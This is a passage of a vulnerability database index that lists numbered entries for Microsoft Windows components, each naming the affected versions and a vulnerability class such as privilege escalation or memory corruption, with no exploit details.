Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege 